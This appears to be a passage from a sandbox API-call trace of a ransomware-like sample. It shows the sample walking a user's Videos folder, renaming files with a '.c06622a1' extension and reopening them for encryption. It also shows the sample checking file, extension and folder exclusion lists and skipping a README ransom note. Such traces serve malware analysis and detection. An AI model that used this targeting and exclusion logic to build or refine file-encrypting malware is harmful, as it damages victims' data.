CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\yffji.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0156.348] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.348] ReadFile (in: hFile=0x610, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0156.348] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xf47a28bb [0156.348] RtlComputeCrc32 (PartialCrc=0x28bb, Buffer=0x3fe674, Length=0x80) returned 0xcc610933 [0156.349] RtlComputeCrc32 (PartialCrc=0x933, Buffer=0x3fe674, Length=0x80) returned 0xceb5d08a [0156.349] RtlComputeCrc32 (PartialCrc=0xd08a, Buffer=0x3fe674, Length=0x80) returned 0x33e0cc0f [0156.349] RtlComputeCrc32 (PartialCrc=0xcc0f, Buffer=0x3fe674, Length=0x80) returned 0xefd35578 [0156.349] CloseHandle (hObject=0x610) returned 1 [0156.349] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.349] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv" [0156.349] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv") returned 0x57 [0156.349] wcscpy (in: _Dest=0x454015e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.349] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\yffji.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\yffji.flv.c06622a1"), dwFlags=0x8) returned 1 [0156.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\yffji.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0156.351] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.351] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0156.357] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x52676658 [0156.357] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6581803d [0156.357] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x354c2659 [0156.357] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x62ab1170 [0156.357] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x60859168 [0156.357] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71bcc71f [0156.357] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5802b511 [0156.357] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36da66fc [0156.360] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0xfd8fe460 [0156.360] RtlComputeCrc32 (PartialCrc=0xe460, Buffer=0x4700094, Length=0x80) returned 0x52938b4e [0156.360] RtlComputeCrc32 (PartialCrc=0x8b4e, Buffer=0x4700094, Length=0x80) returned 0x207fb5ab [0156.360] RtlComputeCrc32 (PartialCrc=0xb5ab, Buffer=0x4700094, Length=0x80) returned 0x60d890a [0156.360] RtlComputeCrc32 (PartialCrc=0x890a, Buffer=0x4700094, Length=0x80) returned 0x8d3624d7 [0156.360] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0156.360] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.360] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.360] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.361] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0156.361] _wcsicmp (_Str1="backup", _Str2="iOgAhCv1rp-V82bQ") returned -7 [0156.361] wcslen (_String="backup") returned 0x6 [0156.361] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0156.361] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0156.361] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbbb9020, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbbb9020, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbbb9020, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.361] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.361] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.361] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0156.361] _wcsicmp (_Str1="backup", _Str2="4710A08 09t9o0aXhpe") returned 46 [0156.361] wcslen (_String="backup") returned 0x6 [0156.361] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0156.362] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0156.363] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2c9240, ftCreationTime.dwHighDateTime=0x1d5e50b, ftLastAccessTime.dwLowDateTime=0x80057a50, ftLastAccessTime.dwHighDateTime=0x1d5dbd4, ftLastWriteTime.dwLowDateTime=0x80057a50, ftLastWriteTime.dwHighDateTime=0x1d5dbd4, nFileSizeHigh=0x0, nFileSizeLow=0x10d29, dwReserved0=0x0, dwReserved1=0x0, cFileName="AjbC-qWMDbt_1KJeNRxU.swf", cAlternateFileName="AJBC-Q~1.SWF")) returned 1 [0156.363] _wcsicmp (_Str1="AjbC-qWMDbt_1KJeNRxU.swf", _Str2="README.c06622a1.TXT") returned -17 [0156.363] wcsstr (_Str="AjbC-qWMDbt_1KJeNRxU.swf", _SubStr="README") returned 0x0 [0156.363] _wcsicmp (_Str1="autorun.inf", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 11 [0156.363] wcslen (_String="autorun.inf") returned 0xb [0156.363] _wcsicmp (_Str1="boot.ini", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 1 [0156.363] wcslen (_String="boot.ini") returned 0x8 [0156.363] _wcsicmp (_Str1="bootfont.bin", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 1 [0156.363] wcslen (_String="bootfont.bin") returned 0xc [0156.363] _wcsicmp (_Str1="bootsect.bak", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 1 [0156.363] wcslen (_String="bootsect.bak") returned 0xc [0156.363] _wcsicmp (_Str1="desktop.ini", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 3 [0156.363] wcslen (_String="desktop.ini") returned 0xb [0156.363] _wcsicmp (_Str1="iconcache.db", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 8 [0156.363] wcslen (_String="iconcache.db") returned 0xc [0156.363] _wcsicmp (_Str1="ntldr", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 13 [0156.363] wcslen (_String="ntldr") returned 0x5 [0156.363] _wcsicmp (_Str1="ntuser.dat", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 13 [0156.363] wcslen (_String="ntuser.dat") returned 0xa [0156.363] _wcsicmp (_Str1="ntuser.dat.log", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 13 [0156.363] wcslen (_String="ntuser.dat.log") returned 0xe [0156.363] _wcsicmp (_Str1="ntuser.ini", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 13 [0156.363] wcslen (_String="ntuser.ini") returned 0xa [0156.363] _wcsicmp (_Str1="thumbs.db", _Str2="AjbC-qWMDbt_1KJeNRxU.swf") returned 19 [0156.363] wcslen (_String="thumbs.db") returned 0x9 [0156.363] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0156.363] wcslen (_String="386") returned 0x3 [0156.363] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0156.363] wcslen (_String="adv") returned 0x3 [0156.363] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0156.364] wcslen (_String="ani") returned 0x3 [0156.364] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0156.364] wcslen (_String="bat") returned 0x3 [0156.364] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0156.364] wcslen (_String="bin") returned 0x3 [0156.364] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0156.364] wcslen (_String="cab") returned 0x3 [0156.364] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0156.364] wcslen (_String="cmd") returned 0x3 [0156.364] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0156.364] wcslen (_String="com") returned 0x3 [0156.364] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0156.364] wcslen (_String="cpl") returned 0x3 [0156.364] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0156.364] wcslen (_String="cur") returned 0x3 [0156.364] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0156.364] wcslen (_String="deskthemepack") returned 0xd [0156.364] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0156.364] wcslen (_String="diagcab") returned 0x7 [0156.364] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0156.364] wcslen (_String="diagcfg") returned 0x7 [0156.364] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0156.364] wcslen (_String="diagpkg") returned 0x7 [0156.364] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0156.364] wcslen (_String="dll") returned 0x3 [0156.364] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0156.364] wcslen (_String="drv") returned 0x3 [0156.364] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0156.364] wcslen (_String="exe") returned 0x3 [0156.364] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0156.364] wcslen (_String="hlp") returned 0x3 [0156.364] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0156.364] wcslen (_String="icl") returned 0x3 [0156.364] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0156.364] wcslen (_String="icns") returned 0x4 [0156.364] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0156.364] wcslen (_String="ico") returned 0x3 [0156.364] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0156.364] wcslen (_String="ics") returned 0x3 [0156.365] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0156.365] wcslen (_String="idx") returned 0x3 [0156.365] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0156.365] wcslen (_String="ldf") returned 0x3 [0156.365] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0156.365] wcslen (_String="lnk") returned 0x3 [0156.365] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0156.365] wcslen (_String="mod") returned 0x3 [0156.365] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0156.365] wcslen (_String="mpa") returned 0x3 [0156.365] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0156.365] wcslen (_String="msc") returned 0x3 [0156.365] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0156.365] wcslen (_String="msp") returned 0x3 [0156.365] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0156.365] wcslen (_String="msstyles") returned 0x8 [0156.365] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0156.365] wcslen (_String="msu") returned 0x3 [0156.365] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0156.365] wcslen (_String="nls") returned 0x3 [0156.365] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0156.365] wcslen (_String="nomedia") returned 0x7 [0156.365] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0156.365] wcslen (_String="ocx") returned 0x3 [0156.365] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0156.365] wcslen (_String="prf") returned 0x3 [0156.365] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0156.365] wcslen (_String="ps1") returned 0x3 [0156.365] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0156.365] wcslen (_String="rom") returned 0x3 [0156.365] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0156.365] wcslen (_String="rtp") returned 0x3 [0156.365] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0156.365] wcslen (_String="scr") returned 0x3 [0156.365] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0156.365] wcslen (_String="shs") returned 0x3 [0156.365] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0156.365] wcslen (_String="spl") returned 0x3 [0156.365] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0156.366] wcslen (_String="sys") returned 0x3 [0156.366] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0156.366] wcslen (_String="theme") returned 0x5 [0156.366] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0156.366] wcslen (_String="themepack") returned 0x9 [0156.366] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0156.366] wcslen (_String="wpx") returned 0x3 [0156.366] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0156.366] wcslen (_String="lock") returned 0x4 [0156.366] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0156.366] wcslen (_String="key") returned 0x3 [0156.366] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0156.366] wcslen (_String="hta") returned 0x3 [0156.366] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0156.366] wcslen (_String="msi") returned 0x3 [0156.366] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0156.366] wcslen (_String="pdb") returned 0x3 [0156.366] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0156.366] wcslen (_String="sql") returned 0x3 [0156.366] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0156.366] wcslen (_String="sqlite") returned 0x6 [0156.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0156.366] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0156.367] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0156.367] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 0x28 [0156.367] wcscpy (in: _Dest=0x44d00ca, _Source="AjbC-qWMDbt_1KJeNRxU.swf" | out: _Dest="AjbC-qWMDbt_1KJeNRxU.swf") returned="AjbC-qWMDbt_1KJeNRxU.swf" [0156.367] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf", dwFileAttributes=0x80) returned 1 [0156.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ajbc-qwmdbt_1kjenrxu.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0156.367] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.367] ReadFile (in: hFile=0x65c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0156.368] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x9d18062d [0156.368] RtlComputeCrc32 (PartialCrc=0x62d, Buffer=0x3feb74, Length=0x80) returned 0x8a17912d [0156.368] RtlComputeCrc32 (PartialCrc=0x912d, Buffer=0x3feb74, Length=0x80) returned 0xca4a846a [0156.368] RtlComputeCrc32 (PartialCrc=0x846a, Buffer=0x3feb74, Length=0x80) returned 0x6f09d8c9 [0156.368] RtlComputeCrc32 (PartialCrc=0xd8c9, Buffer=0x3feb74, Length=0x80) returned 0xa81a3a5d [0156.368] CloseHandle (hObject=0x65c) returned 1 [0156.368] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0156.368] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf" [0156.368] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf") returned 0x41 [0156.368] wcscpy (in: _Dest=0x44e0102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.369] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ajbc-qwmdbt_1kjenrxu.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ajbc-qwmdbt_1kjenrxu.swf.c06622a1"), dwFlags=0x8) returned 1 [0156.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AjbC-qWMDbt_1KJeNRxU.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ajbc-qwmdbt_1kjenrxu.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0156.371] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.371] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0156.377] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x599b767b [0156.377] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e0e57d8 [0156.377] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15841ed3 [0156.377] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x216b315 [0156.377] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x69bf0743 [0156.377] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x131bbf52 [0156.377] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x19f99c5d [0156.377] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x11ce3853 [0156.380] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0x611788e3 [0156.380] RtlComputeCrc32 (PartialCrc=0x88e3, Buffer=0x4790094, Length=0x80) returned 0x5c20edab [0156.380] RtlComputeCrc32 (PartialCrc=0xedab, Buffer=0x4790094, Length=0x80) returned 0xf16d9b31 [0156.380] RtlComputeCrc32 (PartialCrc=0x9b31, Buffer=0x4790094, Length=0x80) returned 0xee999bd2 [0156.380] RtlComputeCrc32 (PartialCrc=0x9bd2, Buffer=0x4790094, Length=0x80) returned 0x7351cb29 [0156.380] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0156.380] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0156.380] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0156.381] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.381] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0156.381] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0156.381] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0156.381] wcslen (_String="autorun.inf") returned 0xb [0156.381] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0156.381] wcslen (_String="boot.ini") returned 0x8 [0156.381] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0156.381] wcslen (_String="bootfont.bin") returned 0xc [0156.381] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0156.381] wcslen (_String="bootsect.bak") returned 0xc [0156.381] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0156.381] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d3ab800, ftCreationTime.dwHighDateTime=0x1d5e2a6, ftLastAccessTime.dwLowDateTime=0x15122150, ftLastAccessTime.dwHighDateTime=0x1d5e1a9, ftLastWriteTime.dwLowDateTime=0x15122150, ftLastWriteTime.dwHighDateTime=0x1d5e1a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="P2SDJqjsKJSaPnHQeAI", cAlternateFileName="P2SDJQ~1")) returned 1 [0156.381] _wcsicmp (_Str1="$recycle.bin", _Str2="P2SDJqjsKJSaPnHQeAI") returned -76 [0156.381] wcslen (_String="$recycle.bin") returned 0xc [0156.381] _wcsicmp (_Str1="config.msi", _Str2="P2SDJqjsKJSaPnHQeAI") returned -13 [0156.381] wcslen (_String="config.msi") returned 0xa [0156.381] _wcsicmp (_Str1="$windows.~bt", _Str2="P2SDJqjsKJSaPnHQeAI") returned -76 [0156.381] wcslen (_String="$windows.~bt") returned 0xc [0156.382] _wcsicmp (_Str1="$windows.~ws", _Str2="P2SDJqjsKJSaPnHQeAI") returned -76 [0156.382] wcslen (_String="$windows.~ws") returned 0xc [0156.382] _wcsicmp (_Str1="windows", _Str2="P2SDJqjsKJSaPnHQeAI") returned 7 [0156.382] wcslen (_String="windows") returned 0x7 [0156.382] _wcsicmp (_Str1="appdata", _Str2="P2SDJqjsKJSaPnHQeAI") returned -15 [0156.382] wcslen (_String="appdata") returned 0x7 [0156.382] _wcsicmp (_Str1="application data", _Str2="P2SDJqjsKJSaPnHQeAI") returned -15 [0156.382] wcslen (_String="application data") returned 0x10 [0156.382] _wcsicmp (_Str1="boot", _Str2="P2SDJqjsKJSaPnHQeAI") returned -14 [0156.382] wcslen (_String="boot") returned 0x4 [0156.382] _wcsicmp (_Str1="google", _Str2="P2SDJqjsKJSaPnHQeAI") returned -9 [0156.382] wcslen (_String="google") returned 0x6 [0156.382] _wcsicmp (_Str1="mozilla", _Str2="P2SDJqjsKJSaPnHQeAI") returned -3 [0156.382] wcslen (_String="mozilla") returned 0x7 [0156.382] _wcsicmp (_Str1="program files", _Str2="P2SDJqjsKJSaPnHQeAI") returned 64 [0156.382] wcslen (_String="program files") returned 0xd [0156.382] _wcsicmp (_Str1="program files (x86)", _Str2="P2SDJqjsKJSaPnHQeAI") returned 64 [0156.382] wcslen (_String="program files (x86)") returned 0x13 [0156.382] _wcsicmp (_Str1="programdata", _Str2="P2SDJqjsKJSaPnHQeAI") returned 64 [0156.382] wcslen (_String="programdata") returned 0xb [0156.382] _wcsicmp (_Str1="system volume information", _Str2="P2SDJqjsKJSaPnHQeAI") returned 3 [0156.382] wcslen (_String="system volume information") returned 0x19 [0156.382] _wcsicmp (_Str1="tor browser", _Str2="P2SDJqjsKJSaPnHQeAI") returned 4 [0156.382] wcslen (_String="tor browser") returned 0xb [0156.382] _wcsicmp (_Str1="windows.old", _Str2="P2SDJqjsKJSaPnHQeAI") returned 7 [0156.382] wcslen (_String="windows.old") returned 0xb [0156.382] _wcsicmp (_Str1="intel", _Str2="P2SDJqjsKJSaPnHQeAI") returned -7 [0156.382] wcslen (_String="intel") returned 0x5 [0156.382] _wcsicmp (_Str1="msocache", _Str2="P2SDJqjsKJSaPnHQeAI") returned -3 [0156.382] wcslen (_String="msocache") returned 0x8 [0156.382] _wcsicmp (_Str1="perflogs", _Str2="P2SDJqjsKJSaPnHQeAI") returned 51 